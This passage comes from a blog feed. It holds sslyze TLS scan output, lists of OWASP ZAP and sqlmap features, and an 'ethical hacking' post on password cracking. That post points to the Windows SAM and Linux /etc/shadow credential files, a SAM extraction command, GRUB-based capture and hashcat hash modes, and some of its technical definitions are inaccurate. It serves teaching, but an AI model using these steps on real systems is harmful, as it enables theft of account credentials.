class="s1"&gt;'*.googleflights-cn.net'&lt;/span&gt;, &lt;span class="s1"&gt;'admob-cn.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.admob-cn.com'&lt;/span&gt;, &lt;span class="s1"&gt;'googlesandbox-cn.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.googlesandbox-cn.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.safenup.googlesandbox-cn.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.gstatic.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.metric.gstatic.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.gvt1.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.gcpcdn.gvt1.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.gvt2.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.gcp.gvt2.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.url.google.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.youtube-nocookie.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.ytimg.com'&lt;/span&gt;, &lt;span class="s1"&gt;'android.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.android.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.flash.android.com'&lt;/span&gt;, &lt;span class="s1"&gt;'g.cn'&lt;/span&gt;, &lt;span class="s1"&gt;'*.g.cn'&lt;/span&gt;, &lt;span class="s1"&gt;'g.co'&lt;/span&gt;, &lt;span class="s1"&gt;'*.g.co'&lt;/span&gt;, &lt;span class="s1"&gt;'goo.gl'&lt;/span&gt;, &lt;span class="s1"&gt;'www.goo.gl'&lt;/span&gt;, &lt;span class="s1"&gt;'google-analytics.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.google-analytics.com'&lt;/span&gt;, &lt;span class="s1"&gt;'google.com'&lt;/span&gt;, &lt;span class="s1"&gt;'googlecommerce.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.googlecommerce.com'&lt;/span&gt;, &lt;span class="s1"&gt;'ggpht.cn'&lt;/span&gt;, &lt;span class="s1"&gt;'*.ggpht.cn'&lt;/span&gt;, &lt;span class="s1"&gt;'urchin.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.urchin.com'&lt;/span&gt;, &lt;span class="s1"&gt;'youtu.be'&lt;/span&gt;, &lt;span class="s1"&gt;'youtube.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.youtube.com'&lt;/span&gt;, &lt;span class="s1"&gt;'music.youtube.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.music.youtube.com'&lt;/span&gt;, &lt;span class="s1"&gt;'youtubeeducation.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.youtubeeducation.com'&lt;/span&gt;, &lt;span class="s1"&gt;'youtubekids.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.youtubekids.com'&lt;/span&gt;, &lt;span class="s1"&gt;'yt.be'&lt;/span&gt;, &lt;span class="s1"&gt;'*.yt.be'&lt;/span&gt;, &lt;span class="s1"&gt;'android.clients.google.com'&lt;/span&gt;, &lt;span class="s1"&gt;'*.android.google.cn'&lt;/span&gt;, &lt;span class="s1"&gt;'*.chrome.google.cn'&lt;/span&gt;, &lt;span class="s1"&gt;'*.developers.google.cn'&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;

     Certificate &lt;span class="c"&gt;#1 - Trust&lt;/span&gt;
       Hostname Validation:               OK - Certificate matches server &lt;span class="nb"&gt;hostname
       &lt;/span&gt;Android CA Store &lt;span class="o"&gt;(&lt;/span&gt;9.0.0_r9&lt;span class="o"&gt;)&lt;/span&gt;:       OK - Certificate is trusted
       Apple CA Store &lt;span class="o"&gt;(&lt;/span&gt;iOS 14, iPadOS 14, macOS 11, watchOS 7, and tvOS 14&lt;span class="o"&gt;)&lt;/span&gt;:OK - Certificate is trusted
       Java CA Store &lt;span class="o"&gt;(&lt;/span&gt;jdk-13.0.2&lt;span class="o"&gt;)&lt;/span&gt;:        OK - Certificate is trusted
       Mozilla CA Store &lt;span class="o"&gt;(&lt;/span&gt;2021-01-24&lt;span class="o"&gt;)&lt;/span&gt;:     OK - Certificate is trusted
       Windows CA Store &lt;span class="o"&gt;(&lt;/span&gt;2021-02-08&lt;span class="o"&gt;)&lt;/span&gt;:     OK - Certificate is trusted
       Symantec 2018 Deprecation:         OK - Not a Symantec-issued certificate
       Received Chain:                    &lt;span class="k"&gt;*&lt;/span&gt;.google.com &lt;span class="nt"&gt;--&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; WR2 &lt;span class="nt"&gt;--&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; GTS Root R1
       Verified Chain:                    &lt;span class="k"&gt;*&lt;/span&gt;.google.com &lt;span class="nt"&gt;--&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; WR2 &lt;span class="nt"&gt;--&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; GTS Root R1 &lt;span class="nt"&gt;--&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; GlobalSign Root CA
       Received Chain Contains Anchor:    OK - Anchor certificate not sent
       Received Chain Order:              OK - Order is valid
       Verified Chain contains SHA1:      OK - No SHA1-signed certificate &lt;span class="k"&gt;in &lt;/span&gt;the verified certificate chain

     Certificate &lt;span class="c"&gt;#1 - Extensions&lt;/span&gt;
       OCSP Must-Staple:                  NOT SUPPORTED - Extension not found
       Certificate Transparency:          WARNING - Only 2 SCTs included but Google recommends 3 or more

     Certificate &lt;span class="c"&gt;#1 - OCSP Stapling&lt;/span&gt;
                                          NOT SUPPORTED - Server did not send back an OCSP response

 &lt;span class="k"&gt;*&lt;/span&gt; SSL 3.0 Cipher Suites:
     Attempted to connect using 80 cipher suites&lt;span class="p"&gt;;&lt;/span&gt; the server rejected all cipher suites.

 &lt;span class="k"&gt;*&lt;/span&gt; ROBOT Attack:
                                          OK - Not vulnerable.

 &lt;span class="k"&gt;*&lt;/span&gt; TLS 1.3 Cipher Suites:
     Attempted to connect using 5 cipher suites.

     The server accepted the following 3 cipher suites:
        TLS_CHACHA20_POLY1305_SHA256                      256       ECDH: X25519 &lt;span class="o"&gt;(&lt;/span&gt;253 bits&lt;span class="o"&gt;)&lt;/span&gt;
        TLS_AES_256_GCM_SHA384                            256       ECDH: X25519 &lt;span class="o"&gt;(&lt;/span&gt;253 bits&lt;span class="o"&gt;)&lt;/span&gt;
        TLS_AES_128_GCM_SHA256                            128       ECDH: X25519 &lt;span class="o"&gt;(&lt;/span&gt;253 bits&lt;span class="o"&gt;)&lt;/span&gt;


 &lt;span class="k"&gt;*&lt;/span&gt; Connection timed out &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nt"&gt;--resum&lt;/span&gt;: try using &lt;span class="nt"&gt;--slow_connection&lt;/span&gt; to reduce the impact on the server.


 SCAN COMPLETED IN 77.19 S
 &lt;span class="nt"&gt;-------------------------&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
  4. OWASP Zed Attack Proxy(ZAP)
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9w82epbomt7prfd756ax.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9w82epbomt7prfd756ax.png" alt=" " width="800" height="419"&gt;&lt;/a&gt;&lt;br&gt;
Goto navigator&lt;br&gt;
&lt;a href="http://localhost:8080/" rel="noopener noreferrer"&gt;http://localhost:8080/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgvd07fuqj5fj6fswhsus.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgvd07fuqj5fj6fswhsus.png" alt=" " width="800" height="485"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  UI ZAP API
&lt;/h3&gt;

&lt;p&gt;Composants&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;acsrf &lt;/li&gt;
&lt;li&gt;ajaxSpider
&lt;/li&gt;
&lt;li&gt;alert &lt;/li&gt;
&lt;li&gt;alertFilter
&lt;/li&gt;
&lt;li&gt;ascan &lt;/li&gt;
&lt;li&gt;authentication
&lt;/li&gt;
&lt;li&gt;authorization &lt;/li&gt;
&lt;li&gt;autoupdate
&lt;/li&gt;
&lt;li&gt;break &lt;/li&gt;
&lt;li&gt;context
&lt;/li&gt;
&lt;li&gt;core
&lt;/li&gt;
&lt;li&gt;forcedUser
&lt;/li&gt;
&lt;li&gt;graphql
&lt;/li&gt;
&lt;li&gt;httpSessions
&lt;/li&gt;
&lt;li&gt;hud
&lt;/li&gt;
&lt;li&gt;hudfiles
&lt;/li&gt;
&lt;li&gt;importurls
&lt;/li&gt;
&lt;li&gt;keyboard
&lt;/li&gt;
&lt;li&gt;localProxies
&lt;/li&gt;
&lt;li&gt;openapi
&lt;/li&gt;
&lt;li&gt;params
&lt;/li&gt;
&lt;li&gt;pscan &lt;/li&gt;
&lt;li&gt;quickstartlaunch
&lt;/li&gt;
&lt;li&gt;replacer
&lt;/li&gt;
&lt;li&gt;reveal
&lt;/li&gt;
&lt;li&gt;ruleConfig
&lt;/li&gt;
&lt;li&gt;script
&lt;/li&gt;
&lt;li&gt;search
&lt;/li&gt;
&lt;li&gt;selenium
&lt;/li&gt;
&lt;li&gt;sessionManagement &lt;/li&gt;
&lt;li&gt;soap
&lt;/li&gt;
&lt;li&gt;spider
&lt;/li&gt;
&lt;li&gt;stats &lt;/li&gt;
&lt;li&gt;users &lt;/li&gt;
&lt;li&gt;websocket&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;
  
  
  5. Sqlmap
&lt;/h1&gt;

&lt;p&gt;Terminal&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;sqlmap
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;        ___
       __H__
 ___ ___[&lt;span class="s2"&gt;"]_____ ___ ___  {1.5.3#stable}
|_ -| . ["&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;     | .&lt;span class="s1"&gt;'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

Usage: python3 sqlmap [options]

sqlmap: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --shell, --update, --purge, --list-tampers or --dependencies). Use -h for basic and -hh for advanced help

[16:08:05] [WARNING] your sqlmap version is outdated
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



</description>
      <category>owasp</category>
      <category>sslscan</category>
      <category>sslyze</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>Ethical Hacking : Users password cracking</title>
      <dc:creator>BEIDI DINA SAMUEL</dc:creator>
      <pubDate>Sat, 24 Aug 2024 00:36:18 +0000</pubDate>
      <link>https://forem.com/samglish/ethical-hacking-users-password-cracking-4f85</link>
      <guid>https://forem.com/samglish/ethical-hacking-users-password-cracking-4f85</guid>
      <description>&lt;p&gt;&lt;strong&gt;Github project : &lt;br&gt;
 &lt;a href="https://github.com/samglish/Client_side_Advanced" rel="noopener noreferrer"&gt;https://github.com/samglish/Client_side_Advanced&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Password cracking methods&lt;br&gt;
Password storage&lt;br&gt;
Rainbow tables&lt;br&gt;
Windows password&lt;br&gt;
Linux password&lt;/p&gt;
&lt;h1&gt;
  
  
  Methods
&lt;/h1&gt;

&lt;ul&gt;
&lt;li&gt;The first will be to guess it.&lt;/li&gt;
&lt;li&gt;Dictionary&lt;/li&gt;
&lt;li&gt;Brute force&lt;/li&gt;
&lt;li&gt;Hybrid&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;
  
  
  Password storage
&lt;/h1&gt;
&lt;h3&gt;
  
  
  passwords are stored encrypted
&lt;/h3&gt;
&lt;h2&gt;
  
  
  Hashing
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;Hashing&lt;/code&gt; is the process of assigning a numeric value to an alphanumeric string by first converting it into another numeric value and storing it in an indexed table to make data retrieval faster and/or masking the data for encryption, performed by a hash function.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0vo6zua4a7e503pfb14e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0vo6zua4a7e503pfb14e.png" alt=" " width="800" height="453"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Rainbow table
&lt;/h2&gt;

&lt;p&gt;A &lt;code&gt;rainbow table&lt;/code&gt; is in cryptanalysis, a data structure created in 2003 by Philippe Oechslin of EPFL1 to find a password from its fingerprint. It is an improvement of the time-memory tradeoffs proposed by Martin Hellman in the 1980.&lt;/p&gt;
&lt;h3&gt;
  
  
  Structure of a rainbow table
&lt;/h3&gt;

&lt;p&gt;Rainbow tables are composed of hash chains. This procedure is based on a method introduced by Martin Hellman. Based on a certain number of possible passwords, which serve as the starting point for the hash chains, the chains are hashed and the resulting hash value is "reduced" into a form that meets the password criteria and can then be hashed again . It is important here that the reduction functions that perform the reduction are not an inverse of the hash procedure, because such an inverse function does not exist. The reduction turns the hash, which is much larger than the original password, i.e. much more complex, into a value that meets the password strength criteria.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;Example&lt;/code&gt;: The example hash value of the "password" is hunter22&lt;/p&gt;

&lt;p&gt;20d2fe5e369db54ec70906 39a9dc30ec4d6086049362 39d39e2de07fda09eb0b&lt;/p&gt;

&lt;p&gt;The reduction of this could be to use only the first 8 characters of the hash as the next password in the chain. These would then be "20d2fe5e" and can be hashed again as the next step.&lt;/p&gt;

&lt;p&gt;A hash chain consists of "alternating" possible passwords and their corresponding hash values. On its own, however, this method does not offer any advantage over the theoretical use of a simple hash table, because if the hash chains are used to an extent that covers all possible passwords of the corresponding complexity and then these chains are stored in a table, the required storage space is at least as large as that of a simple hash table. Therefore, only the starting point, i.e. the first password and the last "password", i.e. a last reduction of the last created hash value of a chain, is stored in a table. The table thus consists of a corresponding number of start and end points of hash chains.&lt;/p&gt;

&lt;p&gt;If you now have a hash value, you can use the reduction function to test whether the hash value is part of one of the created hash chains. To do this, the reduction function is applied to the hash value. If the result of the function is one of the end points of the chain, then you have found the hash chain that contains the password for the existing hash value. In the most favorable case just described, this would be the penultimate password in the chain, which led to the last hash value in the chain. As a rule, however, you will not find a password directly in the first reduction step. Therefore, the reduction function(s) and the hash function must be repeatedly applied to the originally captured hash value. One can imagine this by trying to put the hash chain containing the captured hash value back together again, starting at the end. The moment the partially constructed hash chain has an endpoint stored in the rainbow table, you have found the complete hash chain and can extract the password in plain text.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0x18do3zxj93ilm3mpl1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0x18do3zxj93ilm3mpl1.png" alt=" " width="536" height="288"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgqmq6qnbzojm2296e8r9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgqmq6qnbzojm2296e8r9.png" alt=" " width="799" height="368"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  The salt
&lt;/h2&gt;

&lt;p&gt;The effectiveness of tables decreases significantly when hash functions are combined with a salt. In the context of a password system, the salt is a random component or counter that changes depending on the user. If two users have the same password, the salt prevents the hashes from being identical. Informally, the salt consists of an operation like this:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;fingerprint = h(password + salt)&lt;/code&gt;&lt;/p&gt;
&lt;h1&gt;
  
  
  Windows password
&lt;/h1&gt;

&lt;ul&gt;
&lt;li&gt;Windows, the most used OS&lt;/li&gt;
&lt;li&gt;More and more secure but still vulnerable&lt;/li&gt;
&lt;li&gt;Storage in a SAM (System Account Management) registry&lt;/li&gt;
&lt;li&gt;Exception, Use of Active Directory (LDAP BDD)&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;C:\&amp;lt;systemroot&amp;gt;\repair &amp;amp; C:\&amp;gt; expand SAM uncompressedSAM&lt;/code&gt;&lt;/p&gt;
&lt;h1&gt;
  
  
  Linux password
&lt;/h1&gt;

&lt;ul&gt;
&lt;li&gt;Different from Windows&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt;, harder than SAM files&lt;/li&gt;
&lt;li&gt;Capture method using grub boot loaders&lt;/li&gt;
&lt;li&gt;Identify then crack&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;# Tools&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Hashcat&lt;/li&gt;
&lt;li&gt;chntpw&lt;/li&gt;
&lt;li&gt;Ophcrack&lt;/li&gt;
&lt;li&gt;Crunch&lt;/li&gt;
&lt;li&gt;Hash-identifier&lt;/li&gt;
&lt;li&gt;findmyhash&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;## Let's try in terminal&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Johnny
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;johnny
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg70fvijmocqdd74ksm8x.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg70fvijmocqdd74ksm8x.png" alt=" " width="800" height="468"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Show shadow then click on &lt;code&gt;start new attack&lt;/code&gt; to crack.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffzc977i6ugn9vby5p3sl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffzc977i6ugn9vby5p3sl.png" alt=" " width="800" height="545"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here we see that the password has been cracked.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu1drg49rzz337qry3ttz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu1drg49rzz337qry3ttz.png" alt=" " width="800" height="526"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h1&gt;
  
  
  hashcat
&lt;/h1&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;hashcat &lt;span class="nt"&gt;--help&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  hash examples
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;
- &lt;span class="o"&gt;[&lt;/span&gt; Hash modes &lt;span class="o"&gt;]&lt;/span&gt; -

      &lt;span class="c"&gt;# | Name                                             | Category&lt;/span&gt;
  &lt;span class="o"&gt;======&lt;/span&gt;+&lt;span class="o"&gt;==================================================&lt;/span&gt;+&lt;span class="o"&gt;======================================&lt;/span&gt;
    900 | MD4                                              | Raw Hash
      0 | MD5                                              | Raw Hash
    100 | SHA1                                             | Raw Hash
   1300 | SHA2-224                                         | Raw Hash
   1400 | SHA2-256                                         | Raw Hash
  10800 | SHA2-384                                         | Raw Hash
   1700 | SHA2-512                                         | Raw Hash
  17300 | SHA3-224                                         | Raw Hash
  17400 | SHA3-256                                         | Raw Hash
  17500 | SHA3-384                                         | Raw Hash
  17600 | SHA3-512                                         | Raw Hash
   6000 | RIPEMD-160                                       | Raw Hash
    600 | BLAKE2b-512                                      | Raw Hash
  11700 | GOST R 34.11-2012 &lt;span class="o"&gt;(&lt;/span&gt;Streebog&lt;span class="o"&gt;)&lt;/span&gt; 256-bit, big-endian | Raw Hash
  11800 | GOST R 34.11-2012 &lt;span class="o"&gt;(&lt;/span&gt;Streebog&lt;span class="o"&gt;)&lt;/span&gt; 512-bit, big-endian | Raw Hash
   6900 | GOST R 34.11-94                                  | Raw Hash
   5100 | Half MD5                                         | Raw Hash
  18700 | Java Object hashCode&lt;span class="o"&gt;()&lt;/span&gt;                           | Raw Hash
  17700 | Keccak-224                                       | Raw Hash
  17800 | Keccak-256                                       | Raw Hash
  17900 | Keccak-384                                       | Raw Hash
  18000 | Keccak-512                                       | Raw Hash
  21400 | sha256&lt;span class="o"&gt;(&lt;/span&gt;sha256_bin&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;                        | Raw Hash
   6100 | Whirlpool                                        | Raw Hash
  10100 | SipHash                                          | Raw Hash
  21000 | BitShares v0.x - sha512&lt;span class="o"&gt;(&lt;/span&gt;sha512_bin&lt;span class="o"&gt;(&lt;/span&gt;pass&lt;span class="o"&gt;))&lt;/span&gt;        | Raw Hash
     10 | md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                                 | Raw Hash, Salted and/or Iterated
     20 | md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                                 | Raw Hash, Salted and/or Iterated
   3800 | md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.&lt;span class="nv"&gt;$pass&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                           | Raw Hash, Salted and/or Iterated
   3710 | md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;                            | Raw Hash, Salted and/or Iterated
   4110 | md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;                      | Raw Hash, Salted and/or Iterated
   4010 | md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;                      | Raw Hash, Salted and/or Iterated
  21300 | md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.sha1&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;                     | Raw Hash, Salted and/or Iterated
     40 | md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.utf16le&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;                        | Raw Hash, Salted and/or Iterated
   2600 | md5&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;                                  | Raw Hash, Salted and/or Iterated
   3910 | md5&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;                       | Raw Hash, Salted and/or Iterated
   4400 | md5&lt;span class="o"&gt;(&lt;/span&gt;sha1&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;                                 | Raw Hash, Salted and/or Iterated
  20900 | md5&lt;span class="o"&gt;(&lt;/span&gt;sha1&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.sha1&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;          | Raw Hash, Salted and/or Iterated
  21200 | md5&lt;span class="o"&gt;(&lt;/span&gt;sha1&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;                      | Raw Hash, Salted and/or Iterated
   4300 | md5&lt;span class="o"&gt;(&lt;/span&gt;strtoupper&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)))&lt;/span&gt;                      | Raw Hash, Salted and/or Iterated
     30 | md5&lt;span class="o"&gt;(&lt;/span&gt;utf16le&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                        | Raw Hash, Salted and/or Iterated
    110 | sha1&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;                                | Raw Hash, Salted and/or Iterated
